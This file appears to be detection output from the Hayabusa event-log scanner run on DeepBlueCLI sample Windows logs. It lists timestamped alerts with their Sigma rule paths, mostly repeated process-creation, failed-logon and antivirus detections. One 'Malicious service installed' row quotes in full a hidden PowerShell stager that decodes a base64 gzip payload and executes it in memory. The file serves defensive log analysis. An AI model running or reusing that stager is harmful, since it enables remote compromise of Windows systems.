Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 